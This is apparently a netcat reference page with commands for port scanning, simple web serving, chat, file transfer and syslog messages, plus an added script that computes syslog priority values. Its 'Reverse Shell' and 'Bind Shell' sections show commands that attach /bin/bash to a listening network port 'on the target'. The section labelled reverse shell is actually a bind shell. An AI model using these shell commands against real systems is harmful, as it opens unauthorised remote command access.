nc

Netcat is a utility that can be used to create connections between two (or more) machines using specified ports. One machine listens for a connection which essentially opens a specific port whilst the other attempts to connect to it. Without firewalls the process is straightforward and allows for a simple connection between the two machines. Firewalls on either machine make it a little more tricky and require a few more steps.


Install Netcat

emerge --ask net-analyzer/openbsd-netcat

Scan a single port

nc -v hostname 80

Scan multiple ports

nc -zv hostname 1-1000

Setup a simple text website

printf 'HTTP/1.1 200 OK\r\n\r\n%s' "$(cat index.html)" | netcat -l 1337

HTTP Requests with Netcat Commands

printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80

Reverse Shell

  • A reverse shell is a remote access approach where you run administrative commands from one terminal while connected to another server on the network. To get started, start Netcat with a shell attached to the connection:

nc -n -v -l -p 1337 -e /bin/bash

Then from any other system on the network you can connect to the shell.

Connect to the reversed shell

nc 127.0.0.1 1337

If it worked, you are now connected to the shell and can type any command.

Bind Shell

Start a bind shell on the target

The commands below:

  • Listen on port 1337
  • Bind /bin/bash to the socket
  • Work on almost all systems

mkfifo /tmp/ncpipe
nc -lvnp 1337 < /tmp/ncpipe | /bin/bash > /tmp/ncpipe 2>&1

Now connect to our bound shell

nc nr1 1337

Chat or Web Server

Create a chat or web server

  • Server
nc -lvvp 1337

Connect to our chat or web server

nc localhost 1337   

Transfer files

Setup listening server (sender)

nc -lvp 1337 < text_file_to_be_sent.txt

Transfer text_file_to_be_sent.txt to our pc (receiver)

nc -w1 nr1 1337 > text_file_to_be_sent.txt

Send syslogs to a server

Value  Severity  Meaning
0      emerg     System unusable
1      alert     Immediate action required
2      crit      Critical condition
3      err       Error condition
4      warning   Warning
5      notice    Normal but significant
6      info      Informational
7      debug     Debug-level message

Facility Value  Facility Name
0               kern
1               user
2               mail
3               daemon
4               auth
5               syslog
6               lpr
7               news
8               uucp
9               cron
10              authpriv
11              ftp
16              local0
17              local1
18              local2
19              local3
20              local4
21              local5
22              local6
23              local7

Value  Description
<13>   user.notice
<14>   user.info
<15>   user.debug
<11>   user.err
<4>    kern.warning
<132>  local4.info (16×8+4)

Quick References

<13> = user.notice
<11> = user.err
<14> = user.info
<134> = local6.info
<191> = local7.debug

How to Generate Specific Priority

  • Example: send a local4.warning

    Facility 20 × 8 = 160
    Severity warning (4)
    160 + 4 = 164

  • So:

    echo '<164>test message' | nc -u -w1 192.168.1.1 514
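
Generalising the local4.warning calculation above to any facility.severity pair, and reversing it to decode a PRI value seen on the wire. This is an added example, not part of the original page. The function names (syslog_pri, syslog_decode, syslog_send) are assumptions chosen for illustration, and facility codes 12-15 are treated as unavailable because the tables here do not list them.

```shell
#!/bin/sh
# Added example: build and decode syslog PRI values (PRI = facility * 8 + severity).
# Names are in numeric order, copied from the tables on this page. Facility
# codes 12-15 are not listed there, so "-" marks them as unavailable here.
FACILITIES="kern user mail daemon auth syslog lpr news uucp cron authpriv ftp - - - - local0 local1 local2 local3 local4 local5 local6 local7"
SEVERITIES="emerg alert crit err warning notice info debug"

# index_of NAME LIST... -> zero-based position of NAME; fails if absent
index_of() {
    name=$1; shift; i=0
    for item in "$@"; do
        [ "$item" != "$name" ] || { echo "$i"; return 0; }
        i=$((i + 1))
    done
    return 1
}

# name_at INDEX LIST... -> entry at zero-based INDEX (caller checks the range)
name_at() { shift "$(($1 + 1))"; printf '%s\n' "$1"; }

# syslog_pri FACILITY.SEVERITY -> numeric PRI, e.g. local4.warning -> 164
syslog_pri() {
    case $1 in -.*) return 2 ;; *.*) ;; *) return 2 ;; esac
    f=$(index_of "${1%%.*}" $FACILITIES) || return 2
    s=$(index_of "${1#*.}" $SEVERITIES) || return 2
    echo $((f * 8 + s))
}

# syslog_decode PRI -> FACILITY.SEVERITY; accepts 164 or <164>
syslog_decode() {
    pri=${1#<}; pri=${pri%>}
    case $pri in ''|*[!0-9]*|0?*|????*) return 2 ;; esac  # 1-3 digits, no leading zero
    [ "$pri" -le 191 ] || return 2
    fac=$(name_at $((pri / 8)) $FACILITIES)
    [ "$fac" != "-" ] || return 2
    echo "$fac.$(name_at $((pri % 8)) $SEVERITIES)"
}

# syslog_send HOST FACILITY.SEVERITY MESSAGE -> one UDP datagram to port 514,
# with the same nc flags as the command above
syslog_send() {
    p=$(syslog_pri "$2") || { echo "bad priority: $2" >&2; return 2; }
    printf '<%s>%s\n' "$p" "$3" | nc -u -w1 "$1" 514
}
```

Source the file, then call for example: syslog_send 192.168.1.1 local4.warning 'test message'.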

Send UDP Test Message

nc -w0 -u 192.168.1.102 514 <<< "testing again from my home machine"
echo hi | nc -w0 -u 78.69.211.116 1337